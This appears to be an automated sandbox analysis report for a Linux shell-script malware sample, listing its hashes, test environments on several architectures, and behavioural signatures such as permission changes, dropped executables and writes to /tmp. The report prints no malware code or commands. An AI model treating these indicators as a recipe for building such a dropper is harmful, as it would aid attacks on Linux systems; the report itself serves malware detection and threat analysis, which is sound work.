Analysis
-
max time kernel
36s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240611-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
25/11/2024, 02:51
Static task
static1
Behavioral task
behavioral1
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
-
Size
10KB
-
MD5
8eccec101f87a3ed0841253c005aa97f
-
SHA1
1619e034a10047b30bb121c4da04a6876dd1f076
-
SHA256
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719
-
SHA512
af180fba356f1d42cde849697eb3326d656c3e3cb1fee810d3bd038d24cf802ad4d93e67121dbb1cf54a49e67ea395a2cded2d2b457c496f069f7532054c9a33
-
SSDEEP
96:Mk0WT740kP3wjK6sX4AcqQuUHCH2HI9H1Dzf740kP3G9mt0jUjK6swUDAAcT5HCq:Mk0WTDjK6sX4AcqQurcIUK6sJMAch
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97